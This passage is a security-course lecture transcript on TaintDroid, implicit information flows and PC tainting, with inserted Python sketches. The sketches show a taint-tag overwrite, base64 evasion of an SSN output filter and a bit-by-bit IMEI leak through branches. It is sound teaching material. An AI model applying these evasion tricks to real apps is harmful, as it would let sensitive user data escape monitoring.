this because at a high level--

1127
00:54:42,258 --> 00:54:43,580
where do we have it.

1128
00:54:43,580 --> 00:54:47,716
So the Dalvik VM and TaintDroid
is executing these high level

1129
00:54:47,716 --> 00:54:49,960
instructions and it's
assigning taint at this level.

1130
00:54:49,960 --> 00:54:52,340
You can imagine doing that
at the hardware level, too.

1131
00:54:52,340 --> 00:54:53,840
So actually, if
this is the silicon,

1132
00:54:53,840 --> 00:54:55,340
you can probably make that work.

1133
00:54:55,340 --> 00:54:56,840
So that's definitely possible.

1134
00:54:56,840 --> 00:54:58,340
You had a question?

1135
00:54:58,340 --> 00:55:00,840
AUDIENCE: What
does TaintDroid do

1136
00:55:00,840 --> 00:55:03,840
with information built from
branching and permission tests.

1137
00:55:03,840 --> 00:55:06,090
PROFESSOR: Oh, we're going
to get to that in a second.

1138
00:55:06,090 --> 00:55:08,339
So just hold that thought,
we're going to get to that.

1139
00:55:08,339 --> 00:55:10,588
AUDIENCE: I'm curious,
how vulnerable is it

1140
00:55:10,588 --> 00:55:13,796
to things like buffer overflow
because all the things are so

1141
00:55:13,796 --> 00:55:14,962
nested together [INAUDIBLE]?

1142
00:55:18,850 --> 00:55:20,340
PROFESSOR: That's
a good question.

1143
00:55:20,340 --> 00:55:24,530
So presumably, one would hope
that in a language like Java

1144
00:55:24,530 --> 00:55:26,950
there are no buffer
overflows, right.

1145
00:55:26,950 --> 00:55:29,436
But you can imagine
in a language like C,

1146
00:55:29,436 --> 00:55:31,700
for example, where you
didn't have this protection,

1147
00:55:31,700 --> 00:55:33,950
maybe there's something
catastrophic that could happen

1148
00:55:33,950 --> 00:55:35,964
or somehow, if you
did a buffer overflow

1149
00:55:35,964 --> 00:55:37,880
and then you were able
to overwrite taint tags

1150
00:55:37,880 --> 00:55:41,239
and you could set this to
zeros, then you could just

1151
00:55:41,239 --> 00:55:42,280
let your data exfiltrate.
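
A simulated version of that attack, assuming a made-up layout in which a three-word buffer is followed directly by its taint tag and writes are not bounds-checked, as they would not be in C. `memory` and `unchecked_write` are hypothetical; Python itself would raise an error on a real out-of-range write, so the overflow is modeled inside one flat list.

```python
TAINT_SECRET = 0x1  # hypothetical tag bit

# Layout (assumed for illustration): [buf[0], buf[1], buf[2], tag_of_buf]
memory = [11, 22, 33, TAINT_SECRET]
BUF_START, BUF_LEN, TAG_INDEX = 0, 3, 3


def unchecked_write(mem, start, words):
    """Copy words into mem with no check against the buffer's length."""
    for i, w in enumerate(words):
        mem[start + i] = w


# Four words go into a three-word buffer; the fourth lands on the tag.
unchecked_write(memory, BUF_START, [11, 22, 33, 0])
print(memory[:BUF_LEN], memory[TAG_INDEX])
```

The buffer's contents are unchanged but its tag is now zero, so a later check at a sink would let the data through.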

1152
00:55:42,280 --> 00:55:45,196
AUDIENCE: I think if
it's super predictable,

1153
00:55:45,196 --> 00:55:47,626
like one every other one
for the next q variables,

1154
00:55:47,626 --> 00:55:49,084
there's no stacking--

1155
00:55:49,084 --> 00:55:51,546
PROFESSOR: I was going to
say, that's exactly right.

1156
00:55:51,546 --> 00:55:52,550
So you run into
somewhat similar issues

1157
00:55:52,550 --> 00:55:54,720
like what we discussed
with the stack canaries,

1158
00:55:54,720 --> 00:55:57,520
because basically we have
this data on the stack,

1159
00:55:57,520 --> 00:56:00,370
like in this particular
layout, that you either

1160
00:56:00,370 --> 00:56:02,720
want to make it
impossible to overwrite,

1161
00:56:02,720 --> 00:56:05,400
or if it is overwritten, you want
to detect that in some way.

1162
00:56:05,400 --> 00:56:07,264
So you're exactly
right about that.

1163
00:56:12,120 --> 00:56:16,069
So you can in fact do taint
tracking at this low level

1164
00:56:16,069 --> 00:56:18,360
although it may be expensive
and a little bit difficult

1165
00:56:18,360 --> 00:56:19,700
to get right.

1166
00:56:19,700 --> 00:56:21,980
So you might say well,
why don't we just punt

1167
00:56:21,980 --> 00:56:24,313
on this whole issue of taint
tracking in the first place

1168
00:56:24,313 --> 00:56:26,870
and instead we're just
going to look at the things

1169
00:56:26,870 --> 00:56:29,450
that the program tries to output
over the network, let's say,

1170
00:56:29,450 --> 00:56:32,290
and just do a scan for
data that seems sensitive.

1171
00:56:32,290 --> 00:56:34,150
That seems to be much
more lightweight,

1172
00:56:34,150 --> 00:56:37,240
you don't have to do this
dynamic instrumentation of all

1173
00:56:37,240 --> 00:56:39,240
the things the program's doing.

1174
00:56:39,240 --> 00:56:41,600
The problem with that,
though, is that that will only

1175
00:56:41,600 --> 00:56:43,210
work as a heuristic.

1176
00:56:43,210 --> 00:56:46,100
In fact, if the attacker knows
that this is what you're doing,

1177
00:56:46,100 --> 00:56:47,871
then it's pretty
easy to subvert that.

1178
00:56:47,871 --> 00:56:49,620
So if you're just
sitting there and you're

1179
00:56:49,620 --> 00:56:53,940
trying to do a grep for numbers,
Social Security numbers,

1180
00:56:53,940 --> 00:56:57,030
then the attacker can
just use base 64 encoding,

1181
00:56:57,030 --> 00:56:59,190
or do some other wacky
thing, compress it.

1182
00:56:59,190 --> 00:57:01,630
It's actually trivial to get
past that type of filter.

1183
00:57:01,630 --> 00:57:03,360
So in practice,
that's completely

1184
00:57:03,360 --> 00:57:06,060
insufficient from the
security perspective.
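
A small sketch of why output scanning is only a heuristic, assuming the filter is a regular expression for Social Security numbers in the usual dashed form. `SSN_PATTERN` and `looks_sensitive` are hypothetical names and the number is a made-up sample.

```python
import base64
import re

# Hypothetical filter: flag anything shaped like 123-45-6789.
SSN_PATTERN = re.compile(rb"\b\d{3}-\d{2}-\d{4}\b")


def looks_sensitive(payload: bytes) -> bool:
    """Return True if the outgoing payload contains an SSN-shaped string."""
    return SSN_PATTERN.search(payload) is not None


plain = b"ssn=078-05-1120"           # sample value for illustration only
encoded = base64.b64encode(plain)    # what the attacker sends instead

print(looks_sensitive(plain), looks_sensitive(encoded))
print(base64.b64decode(encoded) == plain)
```

The encoded payload contains no dashes at all, so the pattern cannot match it, yet the receiving server recovers the original bytes with one call.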

1185
00:57:06,060 --> 00:57:07,650
Now let's get back
to the question

1186
00:57:07,650 --> 00:57:11,650
that you brought up,
which was basically

1187
00:57:11,650 --> 00:57:16,380
how can we track flows
through things like branches,

1188
00:57:16,380 --> 00:57:17,290
for example.

1189
00:57:17,290 --> 00:57:20,312
So this is basically
going to lead us

1190
00:57:20,312 --> 00:57:27,450
to a topic that's
called implicit flows.

1191
00:57:27,450 --> 00:57:29,900
And so an implicit
flow occurs typically

1192
00:57:29,900 --> 00:57:32,540
when you have a
tainted value that's

1193
00:57:32,540 --> 00:57:38,560
going to affect the way that
another variable is assigned,

1194
00:57:38,560 --> 00:57:42,730
even though that tainted
value isn't directly

1195
00:57:42,730 --> 00:57:43,530
assigned to that variable.

1196
00:57:43,530 --> 00:57:46,470
This will make more sense
with a concrete example.

1197
00:57:46,470 --> 00:57:51,980
Let's say that you have an if
statement that does something

1198
00:57:51,980 --> 00:57:54,130
like, it's going to
look at your IMEI

1199
00:57:54,130 --> 00:57:58,110
and it's going to say
if it's greater than 42,

1200
00:57:58,110 --> 00:58:03,340
maybe I'm going
to assign 0 to x.

1201
00:58:03,340 --> 00:58:08,350
Otherwise I'm going to assign 1.

1202
00:58:08,350 --> 00:58:11,430
So what's interesting
here is that we're

1203
00:58:11,430 --> 00:58:14,240
looking at this
sensitive data here

1204
00:58:14,240 --> 00:58:16,960
and we're doing some
comparison of it up here,

1205
00:58:16,960 --> 00:58:19,610
but when we're assigning
to x down here,

1206
00:58:19,610 --> 00:58:21,470
we're not actually
assigning something

1207
00:58:21,470 --> 00:58:26,940
that is directly derived
from the sensitive data here.

1208
00:58:26,940 --> 00:58:29,200
This is an example of one
of these implicit flows.

1209
00:58:29,200 --> 00:58:31,070
Because the value
of x is actually

1210
00:58:31,070 --> 00:58:34,880
dependent on this thing
here, but the adversary,

1211
00:58:34,880 --> 00:58:37,380
if they're clever, can sort of
structure their code in a way

1212
00:58:37,380 --> 00:58:39,340
that there's no
direct assignment.

1213
00:58:39,340 --> 00:58:42,427
Now note that even here,
instead of just assigning to x,

1214
00:58:42,427 --> 00:58:44,260
you can just say let's
try to send something

1215
00:58:44,260 --> 00:58:45,190
over the network.

1216
00:58:45,190 --> 00:58:48,440
You might say over
the network x is 0,

1217
00:58:48,440 --> 00:58:50,250
or x is 1, or
something like that.

1218
00:58:50,250 --> 00:58:53,860
So that's an example of one
of these implicit flows that

1219
00:58:53,860 --> 00:58:57,050
a system like TaintDroid
cannot actually handle.
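
The if statement on the board can be sketched as follows, assuming a tracker that only propagates taint through assignments. `branch_on_imei` and `leak_bits` are hypothetical names and the IMEI is a made-up sample. The second function repeats the same trick once per bit, which is one way an adversary could copy the whole value without any direct assignment.

```python
TAINT_IMEI = 0x1  # hypothetical tag bit


def branch_on_imei(imei_value, imei_tag):
    """x depends on the IMEI, but is only ever assigned untainted constants."""
    if imei_value > 42:       # the comparison reads tainted data...
        x, x_tag = 0, 0       # ...but a constant's tag is empty
    else:
        x, x_tag = 1, 0
    return x, x_tag


def leak_bits(imei_value, nbits):
    """Rebuild the value one bit at a time using only constant assignments."""
    recovered, recovered_tag = 0, 0
    for i in range(nbits):
        if (imei_value >> i) & 1:
            bit = 1           # untainted constant
        else:
            bit = 0
        recovered |= bit << i
    return recovered, recovered_tag


imei = 356938035643809        # sample 15-digit value for illustration
print(branch_on_imei(imei, TAINT_IMEI))
print(leak_bits(imei, 50) == (imei, 0))
```

In both cases the result carries an empty tag, so a check at the network sink sees nothing sensitive.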

1220
00:58:57,050 --> 00:59:00,990
So do people sort of see the
problem here at a high level?

1221
00:59:00,990 --> 00:59:01,490
Yes.

1222
00:59:01,490 --> 00:59:03,890
This is called an
implicit flow, in contrast

1223
00:59:03,890 --> 00:59:08,042
to those explicit flows like
from the assignment operator.

1224
00:59:08,042 --> 00:59:15,838
AUDIENCE: What if [INAUDIBLE]
a native power function that

1225
00:59:15,838 --> 00:59:17,335
did exactly [INAUDIBLE]?

1226
00:59:20,735 --> 00:59:23,355
Because the output in
that case would be, right?

1227
00:59:23,355 --> 00:59:24,480
PROFESSOR: Well, let's see.

1228
00:59:24,480 --> 00:59:26,074
So it depends.

1229
00:59:26,074 --> 00:59:28,002
So if I understand your
question correctly,

1230
00:59:28,002 --> 00:59:29,930
you're saying there could
be some native function that

1231
00:59:29,930 --> 00:59:31,440
does something that's sort
of equivalent to this,

1232
00:59:31,440 --> 00:59:34,016
and so for example, TaintDroid
wouldn't know necessarily,

1233
00:59:34,016 --> 00:59:35,890
because it can't look
inside this native code

1234
00:59:35,890 --> 00:59:38,627
to see this type of thing.

1235
00:59:38,627 --> 00:59:40,925
The way that the authors
claim that they would handle

1236
00:59:40,925 --> 00:59:44,775
that is that they would say for
native methods that are defined

1237
00:59:44,775 --> 00:59:47,380
by the VM itself, they
would look at the contract

1238
00:59:47,380 --> 00:59:49,140
that method exposes
and they might

1239
00:59:49,140 --> 00:59:51,540
say things like I take
these two integers

1240
00:59:51,540 --> 00:59:52,980
and then return the average.

1241
00:59:52,980 --> 00:59:54,960
So then the TaintDroid
system would

1242
00:59:54,960 --> 00:59:57,224
say we trust that the native
function does that, so we

1243
00:59:57,224 --> 00:59:59,224
need to figure out what
the appropriate tainting

1244
00:59:59,224 --> 01:00:00,380
policy should be.

1245
01:00:00,380 --> 01:00:03,165
However, you are correct
that if something like this

1246
01:00:03,165 --> 01:00:05,880
was sort of hidden inside and
for whatever reason wasn't

1247
01:00:05,880 --> 01:00:07,850
exposed to the
public-facing contract,

1248
01:00:07,850 --> 01:00:13,310
then the manual policy that the
TaintDroid authors came up with

1249
01:00:13,310 --> 01:00:15,220
might not catch
this implicit flow.

1250
01:00:15,220 --> 01:00:16,700
It might actually
allow information

1251
01:00:16,700 --> 01:00:17,534
to leak out somehow.

1252
01:00:17,534 --> 01:00:19,367
But I mean for that
matter, there might even

1253
01:00:19,367 --> 01:00:23,514
be a direct flow in there that
the TaintDroid authors couldn't

1254
01:00:23,514 --> 01:00:26,958
see and you might still have
an even more direct leak.

1255
01:00:26,958 --> 01:00:30,402
AUDIENCE: So in practice, this
seems very dangerous, right?

1256
01:00:30,402 --> 01:00:32,862
Because you can literally send
the whole [INAUDIBLE] value

1257
01:00:32,862 --> 01:00:37,782
by just looking at
this last three--

1258
01:00:37,782 --> 01:00:38,870
PROFESSOR: That's right.

1259
01:00:38,870 --> 01:00:40,780
We had class a few times where
you'd sit in a while loop

1260
01:00:40,780 --> 01:00:42,990
and you'd try to construct
these implicit flows to do

1261
01:00:42,990 --> 01:00:44,050
these types of things.

1262
01:00:44,050 --> 01:00:45,950
There's actually
some ways that you

1263
01:00:45,950 --> 01:00:49,390
can think about trying to
fix some of this stuff.

1264
01:00:49,390 --> 01:00:52,142
At a high level,
one approach you

1265
01:00:52,142 --> 01:00:53,618
can do to try to
prevent this stuff

1266
01:00:53,618 --> 01:01:03,600
is you can actually assign
a taint tag to the PC.

1267
01:01:07,390 --> 01:01:18,690
Then essentially you taint
it with the branch test.

1268
01:01:18,690 --> 01:01:23,130
So the idea here is that we as
humans can look at this code

1269
01:01:23,130 --> 01:01:25,380
here and we can tell that
there's this implicit flow

1270
01:01:25,380 --> 01:01:28,470
here, because we know
that somehow to get here,

1271
01:01:28,470 --> 01:01:30,355
we had to look at
the sensitive data.

1272
01:01:30,355 --> 01:01:32,480
So what does that mean at
the implementation level?

1273
01:01:32,480 --> 01:01:33,979
That means that to
get here, there's

1274
01:01:33,979 --> 01:01:39,180
something about the PC that has
been tainted by sensitive data.

1275
01:01:39,180 --> 01:01:40,710
To say that we
have gotten here is

1276
01:01:40,710 --> 01:01:43,450
to say the PC has been
set to here or to here.

1277
01:01:43,450 --> 01:01:48,090
At a high level we could
imagine that the system would

1278
01:01:48,090 --> 01:01:49,860
do some analysis
and it would say

1279
01:01:49,860 --> 01:01:54,050
that at this point in the code,
the PC has no taint at all.

1280
01:01:54,050 --> 01:01:57,180
At this point, it gets
tainted somehow by the IMEI,

1281
01:01:57,180 --> 01:02:01,820
and at this point here, it's
going to have that taint.

1282
01:02:01,820 --> 01:02:06,257
So what will end up happening
is that if x is a variable that

1283
01:02:06,257 --> 01:02:08,090
initially shows up with
no taint maybe we'll

1284
01:02:08,090 --> 01:02:09,675
say OK, at this
point, it's actually

1285
01:02:09,675 --> 01:02:11,800
going to get the taint of
the PC which is actually

1286
01:02:11,800 --> 01:02:13,450
going to taint it there.

1287
01:02:13,450 --> 01:02:15,787
So there's some subtlety
here that I'm glossing over,

1288
01:02:15,787 --> 01:02:18,200
but at a high level that's
how you can capture some

1289
01:02:18,200 --> 01:02:20,450
of these flows here by
actually looking and seeing how

1290
01:02:20,450 --> 01:02:22,345
the PC is getting
set, and then trying

1291
01:02:22,345 --> 01:02:28,190
to propagate that to the
targets of these if statements.
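
A minimal sketch of the PC-tainting idea, assuming a hypothetical `Tracker` class that records taint labels per variable name. It is not how any particular system implements this: entering a branch pushes the taint of the branch test, every assignment inside picks up that taint, and leaving the branch pops it again.

```python
from contextlib import contextmanager


class Tracker:
    """Toy taint tracker that also keeps a taint tag for the program counter."""

    def __init__(self):
        self.taint = {}      # variable name -> set of taint labels
        self.pc_stack = []   # taint of each enclosing branch test

    def pc_taint(self):
        # The PC's taint is the union of all enclosing branch tests.
        labels = set()
        for branch_labels in self.pc_stack:
            labels |= branch_labels
        return labels

    def assign(self, name, source_labels=()):
        # An assigned variable gets the taint of its sources plus the PC's taint.
        self.taint[name] = set(source_labels) | self.pc_taint()

    @contextmanager
    def branch(self, test_labels):
        # Taint the PC with the branch test for the duration of the branch.
        self.pc_stack.append(set(test_labels))
        try:
            yield
        finally:
            self.pc_stack.pop()


t = Tracker()
t.assign("imei", {"IMEI"})          # sensitive source
t.assign("x")                       # x starts with no taint
with t.branch(t.taint["imei"]):     # if (imei > 42) ...
    t.assign("x")                   # x = 0 or x = 1: picks up the PC taint
t.assign("y")                       # after the branch: PC taint is gone
```

Note that this naive scheme taints `x` even when both arms assign the same constant, so it can over-taint.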

1292
01:02:28,190 --> 01:02:30,390
Does that all make sense?

1293
01:02:30,390 --> 01:02:30,940
OK.

1294
01:02:30,940 --> 01:02:32,648
And if you're interested
in learning more

1295
01:02:32,648 --> 01:02:36,005
about this, come talk to me,
there's been a lot of research

1296
01:02:36,005 --> 01:02:37,340
into this kind of stuff.

1297
01:02:37,340 --> 01:02:41,280
However, you can imagine that
the system I just described

1298
01:02:41,280 --> 01:02:44,750
may be too conservative
once again.

1299
01:02:44,750 --> 01:02:49,770
So imagine that instead
of having this code here,

1300
01:02:49,770 --> 01:02:51,980
this was also 0.

1301
01:02:51,980 --> 01:02:56,300
So in this dumb case,
there's absolutely no reason

1302
01:02:56,300 --> 01:03:00,830
to taint x with anything
related to the IMEI,

1303
01:03:00,830 --> 01:03:03,590
because you didn't actually
leak any information

1304
01:03:03,590 --> 01:03:04,995
in either of these branches.

1305
01:03:04,995 --> 01:03:09,780
But if you use it with a
naive PC tainting scheme,

1306
01:03:09,780 --> 01:03:16,580
then you might over-estimate
how much x has been tainted by.

1307
01:03:16,580 --> 01:03:18,730
So I should say there's
some subtlety you

1308
01:03:18,730 --> 01:03:21,380
can do to try to get around
some of these issues,

1309
01:03:21,380 --> 01:03:24,010
but it's a little bit tricky.

1310
01:03:24,010 --> 01:03:25,435
Does this all make sense?

1311
01:03:28,006 --> 01:03:28,505
All right.

1312
01:03:28,505 --> 01:03:29,373
AUDIENCE: Just a question.

1313
01:03:29,373 --> 01:03:30,339
PROFESSOR: Oh, sorry.

1314
01:03:30,339 --> 01:03:33,720
AUDIENCE: When you get out of
the if statement, so you're out

1315
01:03:33,720 --> 01:03:36,062
of the branch, do you
[INAUDIBLE] taint out?

1316
01:03:36,062 --> 01:03:37,520
PROFESSOR: Yeah,
so typically, yes.

1317
01:03:37,520 --> 01:03:40,640
So like down here the PC
taint would be cleared.

1318
01:03:40,640 --> 01:03:43,608
So it would only be set inside
these branch things here.

1319
01:03:43,608 --> 01:03:45,566
And the reason for that
is because essentially,

1320
01:03:45,566 --> 01:03:47,770
by the time you
get down here, you

1321
01:03:47,770 --> 01:03:49,686
get down here regardless
of what the IMEI was.

1322
01:03:49,686 --> 01:03:51,114
So yeah, you clear that.

1323
01:03:51,114 --> 01:03:52,066
It's a good question.

1324
01:03:55,480 --> 01:03:55,980
Let's see.

1325
01:04:00,680 --> 01:04:03,860
We talked about how you
might be able to taint

1326
01:04:03,860 --> 01:04:07,450
at this very low level, even
though that might be expensive,

1327
01:04:07,450 --> 01:04:09,130
one reason why it
might be useful

1328
01:04:09,130 --> 01:04:10,705
is because it will
actually allow

1329
01:04:10,705 --> 01:04:12,680
you to do things like see what
your data lifetimes look like.

1330
01:04:12,680 --> 01:04:14,763
So a couple lectures ago,
we talked about the fact

1331
01:04:14,763 --> 01:04:16,990
that a lot of times
key data, for example,

1332
01:04:16,990 --> 01:04:19,365
will live in memory longer
than you think that it should.

1333
01:04:19,365 --> 01:04:24,612
So you can imagine that even
if some of the x86 or ARM level

1334
01:04:24,612 --> 01:04:27,059
taint tracking is
expensive, you can imagine

1335
01:04:27,059 --> 01:04:28,725
using it to form an
audit of your system

1336
01:04:28,725 --> 01:04:30,190
and actually
tainting, let's say,

1337
01:04:30,190 --> 01:04:32,415
some secret key that
the user entered,

1338
01:04:32,415 --> 01:04:34,980
and just seeing where that
goes throughout your system.

1339
01:04:34,980 --> 01:04:37,146
It's an offline analysis,
it's not facing customers,

1340
01:04:37,146 --> 01:04:38,380
so it's OK for it to be slow.

1341
01:04:38,380 --> 01:04:40,810
That might actually really
help you to figure out oh,

1342
01:04:40,810 --> 01:04:43,550
this data's getting into
the keyboard buffer,

1343
01:04:43,550 --> 01:04:46,240
it's getting into the X server,
it's getting to wherever.

1344
01:04:46,240 --> 01:04:49,240
So even if it's slow, that can
still be very, very useful.

1345
01:04:49,240 --> 01:04:54,180
So I just wanted to
mention that briefly.

1346
01:04:54,180 --> 01:04:57,290
One interesting thing
you might think about

1347
01:04:57,290 --> 01:05:01,010
is the fact that as I
mentioned, TaintDroid

1348
01:05:01,010 --> 01:05:06,490
is nice because it constrains
the universe of taint sources

1349
01:05:06,490 --> 01:05:08,090
and taint sinks.

1350
01:05:08,090 --> 01:05:10,090
But as the developer,
maybe you want to actually

1351
01:05:10,090 --> 01:05:17,895
explicitly assert some more
fine-grained control over the labels

1352
01:05:17,895 --> 01:05:19,270
that your program
interacts with.

1353
01:05:19,270 --> 01:05:23,110
So now as a programmer, you
want to be able to say something

1354
01:05:23,110 --> 01:05:23,900
like this.

1355
01:05:23,900 --> 01:05:30,320
So you declare some int, and
let's say we call it x,

1356
01:05:30,320 --> 01:05:34,320
then you associate
some label with it.

1357
01:05:34,320 --> 01:05:36,360
Maybe the name of this
label is that Alice

1358
01:05:36,360 --> 01:05:39,330
is the owner of
this data, but Alice

1359
01:05:39,330 --> 01:05:42,320
permits Bob, or something
labeled with Bob,

1360
01:05:42,320 --> 01:05:43,744
to be able to see that.

1361
01:05:43,744 --> 01:05:46,160
TaintDroid doesn't let you do
this, because it essentially

1362
01:05:46,160 --> 01:05:47,830
controls that
universe of labels.

1363
01:05:47,830 --> 01:05:49,534
But maybe as a
programmer you want

1364
01:05:49,534 --> 01:05:51,510
to be able to do
a thing like this.

1365
01:05:51,510 --> 01:05:56,770
You can imagine that your
program has various input

1366
01:05:56,770 --> 01:06:01,825
channels and output
channels, and all

1367
01:06:01,825 --> 01:06:03,898
of these input and
output channels,

1368
01:06:03,898 --> 01:06:06,310
they all have labels, too.

1369
01:06:06,310 --> 01:06:08,950
And these are labels
that you as a programmer

1370
01:06:08,950 --> 01:06:11,790
get to actually pick, as
opposed to the system itself

1371
01:06:11,790 --> 01:06:14,600
trying to say here's this
predefined set of things.

1372
01:06:14,600 --> 01:06:23,620
So maybe say for input channels,
you know the read values,

1373
01:06:23,620 --> 01:06:25,450
maybe they get the
label of the channel.

1374
01:06:28,040 --> 01:06:33,777
That's very similar to how
TaintDroid works right now.

1375
01:06:33,777 --> 01:06:35,360
So if you read
something from the GPS,

1376
01:06:35,360 --> 01:06:37,359
that read value is the
taint of the GPS channel,

1377
01:06:37,359 --> 01:06:43,330
but now you as a programmer can
choose what those labels are.

1378
01:06:43,330 --> 01:06:47,590
And then you could imagine that
for output channels, the label

1379
01:06:47,590 --> 01:06:59,834
of the channel has to match the
label of the value being written.

1380
01:07:05,020 --> 01:07:07,090
You can imagine other
policies here as well.

1381
01:07:07,090 --> 01:07:09,170
But the basic idea is
that there are actually

1382
01:07:09,170 --> 01:07:11,080
programming languages that
allow you the developer

1383
01:07:11,080 --> 01:07:14,055
to pick what the
labels are and what

1384
01:07:14,055 --> 01:07:16,370
the semantics for
those labels can be.

1385
01:07:16,370 --> 01:07:19,346
So what's nice
about some of these

1386
01:07:19,346 --> 01:07:22,078
is they do require the
programmer to do a little bit

1387
01:07:22,078 --> 01:07:26,650
more work, but the
outcome of that work

1388
01:07:26,650 --> 01:07:30,100
is that static checking--
and by static checking

1389
01:07:30,100 --> 01:07:35,948
I mean checking that's
done at compile time--

1390
01:07:35,948 --> 01:07:42,530
can catch many types of
information flow bugs.

1391
01:07:42,530 --> 01:07:46,534
So if you're diligent about
labeling all of your network

1392
01:07:46,534 --> 01:07:49,861
channels and screen channels
with the appropriate

1393
01:07:49,861 --> 01:07:52,266
permissions, and you're
very diligent about labeling

1394
01:07:52,266 --> 01:07:54,090
your data like this,
what can happen

1395
01:07:54,090 --> 01:07:56,930
is that at compile time,
when you compile your program

1396
01:07:56,930 --> 01:07:59,077
your compiler can
tell you things like hey,

1397
01:07:59,077 --> 01:08:01,160
if you were to run this
program, then you actually

1398
01:08:01,160 --> 01:08:05,150
have an information leak that
this particular piece of data

1399
01:08:05,150 --> 01:08:07,910
will pass to a network channel,
which is untrusted.

1400
01:08:07,910 --> 01:08:10,605
And at a high level, the
reason why static checking

1401
01:08:10,605 --> 01:08:13,910
can catch a lot of these bugs
is because usually speaking,

1402
01:08:13,910 --> 01:08:16,340
when you think of some
of these annotations,

1403
01:08:16,340 --> 01:08:18,580
they're somewhat
similar to types.

1404
01:08:18,580 --> 01:08:23,140
So the same way that
compilers can catch errors

1405
01:08:23,140 --> 01:08:25,362
involving types in a
strongly typed language,

1406
01:08:25,362 --> 01:08:26,796
you can imagine
that the compiler

1407
01:08:26,796 --> 01:08:29,664
in a language like this
can run some calculus

1408
01:08:29,664 --> 01:08:32,130
over this label,
and in many cases,

1409
01:08:32,130 --> 01:08:35,251
determine hey, if you would
actually run this program,

1410
01:08:35,251 --> 01:08:36,250
this would be a problem.

1411
01:08:36,250 --> 01:08:39,960
So you really need to fix
the way that the labels work,

1412
01:08:39,960 --> 01:08:42,140
maybe you need to explicitly
declassify something,

1413
01:08:42,140 --> 01:08:43,110
so on and so forth.

1414
01:08:43,110 --> 01:08:45,050
AUDIENCE: You can't
just [INAUDIBLE]?

1415
01:08:48,445 --> 01:08:51,020
PROFESSOR: Yeah,
yeah, that's right.

1416
01:08:51,020 --> 01:08:53,850
So depending on the
language, these labels

1417
01:08:53,850 --> 01:08:57,380
can associate people with IO
ports, all that kind of stuff.

1418
01:08:57,380 --> 01:08:59,533
That's exactly right.

1419
01:08:59,533 --> 01:09:02,949
So this is just
interesting to know about,

1420
01:09:02,949 --> 01:09:06,729
because TaintDroid has a very
nice general introduction

1421
01:09:06,729 --> 01:09:09,280
to this information flow
stuff, but there's actually

1422
01:09:09,280 --> 01:09:10,863
some really hardcore
systems out there

1423
01:09:10,863 --> 01:09:13,084
that can express
much richer semantics

1424
01:09:13,084 --> 01:09:17,500
in the control of a program with
respect to information flow.

1425
01:09:17,500 --> 01:09:20,180
And note, too, that when
we talk about static checking

1426
01:09:20,180 --> 01:09:21,596
and being able to
catch many bugs,

1427
01:09:21,596 --> 01:09:24,406
it's actually preferable
to catch as many bugs using

1428
01:09:24,406 --> 01:09:27,507
static checking and
static failures as opposed

1429
01:09:27,507 --> 01:09:29,998
to dynamic checking
and dynamic failures.

1430
01:09:29,998 --> 01:09:31,706
There's a very subtle
but powerful reason

1431
01:09:31,706 --> 01:09:32,694
for why that is.

1432
01:09:32,694 --> 01:09:35,658
The reason is that,
let's say that we

1433
01:09:35,658 --> 01:09:38,375
defer all of the static
checks to the runtime, which

1434
01:09:38,375 --> 01:09:39,610
you could certainly do.

1435
01:09:39,610 --> 01:09:41,310
There's no reason you couldn't
take all the static checks

1436
01:09:41,310 --> 01:09:42,435
and do them at runtime.

1437
01:09:42,435 --> 01:09:45,770
The problem is that the failure
or success of these checks

1438
01:09:45,770 --> 01:09:48,359
is actually a covert
channel, perhaps.

1439
01:09:48,359 --> 01:09:50,065
So the attacker
could actually feed

1440
01:09:50,065 --> 01:09:52,090
your program some
information and then see

1441
01:09:52,090 --> 01:09:53,819
whether it crashed or not.

1442
01:09:53,819 --> 01:09:55,720
And if it crashed,
it might say, aha,

1443
01:09:55,720 --> 01:09:58,960
you've failed some dynamic
check of information flow, that

1444
01:09:58,960 --> 01:10:01,956
must mean something was
secret about this value I sort

1445
01:10:01,956 --> 01:10:03,800
of cajoled you into computing.

1446
01:10:03,800 --> 01:10:05,590
So you want to try
to make these checks

1447
01:10:05,590 --> 01:10:10,240
as static as possible to the
greatest possible extent.

1448
01:10:10,240 --> 01:10:14,480
If you want more information
on this kind of stuff, maybe

1449
01:10:14,480 --> 01:10:17,818
a good place to start,
a word to search is Jif.

1450
01:10:17,818 --> 01:10:20,041
It's a very
influential system that

1451
01:10:20,041 --> 01:10:23,746
addressed some of these issues
of label computation.

1452
01:10:23,746 --> 01:10:27,204
So you can start there
and sort of roll forward.

1453
01:10:27,204 --> 01:10:29,674
My co-professor actually
has done a lot of good work

1454
01:10:29,674 --> 01:10:31,340
on this, so you could
ask him about that

1455
01:10:31,340 --> 01:10:34,614
if you want to talk
more about label stuff.

1456
01:10:34,614 --> 01:10:38,090
That's sort of interesting
to know that TaintDroid

1457
01:10:38,090 --> 01:10:41,526
is actually fairly restrictive
in the expressiveness

1458
01:10:41,526 --> 01:10:44,560
of the labels it
allows you to look at.

1459
01:10:44,560 --> 01:10:46,143
There are systems
out there that allow

1460
01:10:46,143 --> 01:10:48,150
you to do more powerful stuff.

1461
01:10:51,610 --> 01:10:58,734
Finally, what I'd like to talk
about is what we can do if we

1462
01:10:58,734 --> 01:11:03,040
want to track information
flows in some of these legacy

1463
01:11:03,040 --> 01:11:08,670
programs, or through programs
that are written in C or C++

1464
01:11:08,670 --> 01:11:12,040
that don't have all the
fancy runtime support.

1465
01:11:12,040 --> 01:11:16,046
So there's a very
cute system, by some

1466
01:11:16,046 --> 01:11:20,620
of the same authors as this
paper, that looks at this issue

1467
01:11:20,620 --> 01:11:24,160
of how can we track
information leaks

1468
01:11:24,160 --> 01:11:28,143
in a system in which we
don't want to modify

1469
01:11:28,143 --> 01:11:29,101
the application at all.

1470
01:11:29,101 --> 01:11:30,568
This is the TightLip system.

1471
01:11:30,568 --> 01:11:33,013
So the basic idea is
that they introduce

1472
01:11:33,013 --> 01:11:36,305
this notion of what they
call doppelganger processes.

1473
01:11:42,020 --> 01:11:44,200
TightLip uses doppelganger
processes as follows.

1474
01:11:44,200 --> 01:11:48,350
So the first thing it
does is it periodically

1475
01:11:48,350 --> 01:11:54,082
scans a user's
file system and it

1476
01:11:54,082 --> 01:11:57,690
looks for sensitive file types.

1477
01:11:57,690 --> 01:12:02,720
This might be things like your
mail file, your word processing

1478
01:12:02,720 --> 01:12:04,859
documents, so on and so forth.

1479
01:12:04,859 --> 01:12:07,025
So what it's going to do
for each one of these files

1480
01:12:07,025 --> 01:12:10,210
is it's going to produce
a scrubbed version.

1481
01:12:13,410 --> 01:12:16,060
So for example, if it
finds an email file,

1482
01:12:16,060 --> 01:12:22,002
it's going to replace the to
